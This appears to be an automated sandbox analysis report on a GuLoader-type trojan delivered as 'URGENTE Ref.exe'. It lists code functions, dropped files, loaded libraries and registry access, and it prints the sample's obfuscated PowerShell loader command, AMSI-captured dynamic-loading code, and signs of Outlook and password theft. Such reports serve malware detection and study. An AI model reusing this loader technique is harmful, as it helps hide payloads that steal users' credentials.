          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235D22A010_2_235D22A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE34810_2_235EE348
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E050810_2_235E0508
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE66810_2_235EE668
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E6C8810_2_235E6C88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E7F4810_2_235E7F48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EB14810_2_235EB148
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE97810_2_235EE978
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ECD6810_2_235ECD68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E9B6810_2_235E9B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EDD0810_2_235EDD08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E790810_2_235E7908
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EAB0810_2_235EAB08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EF92810_2_235EF928
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC72810_2_235EC728
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E952810_2_235E9528
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EEFC810_2_235EEFC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E8BC810_2_235E8BC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EBDC810_2_235EBDC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC3F910_2_235EC3F9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED9E810_2_235ED9E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E75E810_2_235E75E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EA7E810_2_235EA7E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED39710_2_235ED397
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE98810_2_235EE988
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EB78810_2_235EB788
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E858810_2_235E8588
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED3A810_2_235ED3A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E6FA810_2_235E6FA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EA1A810_2_235EA1A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EFC4810_2_235EFC48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ECA4810_2_235ECA48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E984810_2_235E9848
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E004010_2_235E0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E826810_2_235E8268
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EB46810_2_235EB468
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EF60810_2_235EF608
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC40810_2_235EC408
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E920810_2_235E9208
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E000610_2_235E0006
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EFC3710_2_235EFC37
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EE02810_2_235EE028
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E7C2810_2_235E7C28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EAE2810_2_235EAE28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED6C810_2_235ED6C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E72C810_2_235E72C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EA4C810_2_235EA4C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E04F710_2_235E04F7
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EAAF710_2_235EAAF7
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EF2E810_2_235EF2E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EC0E810_2_235EC0E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E8EE810_2_235E8EE8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E889810_2_235E8898
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EEC9810_2_235EEC98
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235ED08810_2_235ED088
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E9E8810_2_235E9E88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EECA810_2_235EECA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235E88A810_2_235E88A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_235EBAA810_2_235EBAA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361230010_2_23612300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361004010_2_23610040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361076010_2_23610760
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_23610E4810_2_23610E48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_236137F210_2_236137F2
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361153010_2_23611530
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_23611C1810_2_23611C18
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_236122F110_2_236122F1
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361002210_2_23610022
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361075010_2_23610750
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_23610E3810_2_23610E38
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361152110_2_23611521
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_23611C0810_2_23611C08
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dll 3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
          Source: URGENTE Ref.exe, 00000000.00000000.1212619561.0000000000433000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameimmensest autoecic.exe6 vs URGENTE Ref.exe
          Source: URGENTE Ref.exeBinary or memory string: OriginalFilenameimmensest autoecic.exe6 vs URGENTE Ref.exe
          Source: URGENTE Ref.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/21@7/6
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_0040322B
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404486
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile created: C:\Users\user\AppData\Roaming\fyldepenneblkketsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile created: C:\Users\user\AppData\Local\Temp\nsdD029.tmpJump to behavior
          Source: URGENTE Ref.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Undismembered.exe, 0000000A.00000002.2495516741.00000000207E3000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020816000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.00000000207D3000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.00000000207F1000.00000004.00000800.00020000.00000000.sdmp, Undismembered.exe, 0000000A.00000002.2495516741.0000000020823000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: URGENTE Ref.exeVirustotal: Detection: 33%
          Source: URGENTE Ref.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile read: C:\Users\user\Desktop\URGENTE Ref.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\URGENTE Ref.exe "C:\Users\user\Desktop\URGENTE Ref.exe"
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Undismembered.exe "C:\Users\user\AppData\Local\Temp\Undismembered.exe"
          Source: C:\Users\user\Desktop\URGENTE Ref.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Undismembered.exe "C:\Users\user\AppData\Local\Temp\Undismembered.exe"Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile written: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Eukalyptusen231\Dareful.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: URGENTE Ref.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.1618451140.000000000B086000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ndlandings $Hustruer $Fragtvognes), (pachyhymenic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fgtemesteren = [AppDomain]::CurrentDomain.GetAssemblies()
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bortrationaliserings)), $Prefeudalism).DefineDynamicModule($Albaner, $false).DefineType($Unneutralized, $Venstrehaandsarbejde, [System
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6C7CD push edi; ret 2_2_04D6C7D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6C768 push ebp; ret 2_2_04D6C792
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6C3D0 push ebp; ret 2_2_04D6C792
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6C8ED pushad ; ret 2_2_04D6C8F2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6EB08 push eax; mov dword ptr [esp], edx2_2_04D6EB0C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D6B9C8 push ds; ret 2_2_04D6B9D2
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_3_0019CA98 pushfd ; retf 0019h10_3_0019CA99
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_3_0019EE18 push eax; iretd 10_3_0019EE65
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_3_0019EE8C push eax; iretd 10_3_0019EEA9
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_3_0019CF4C push eax; iretd 10_3_0019CF4D
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00159C30 push esp; retf 0017h10_2_00159D55
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_2361A227 pushfd ; ret 10_2_2361A231
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile created: C:\Users\user\AppData\Local\Temp\nskD2BC.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Undismembered.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
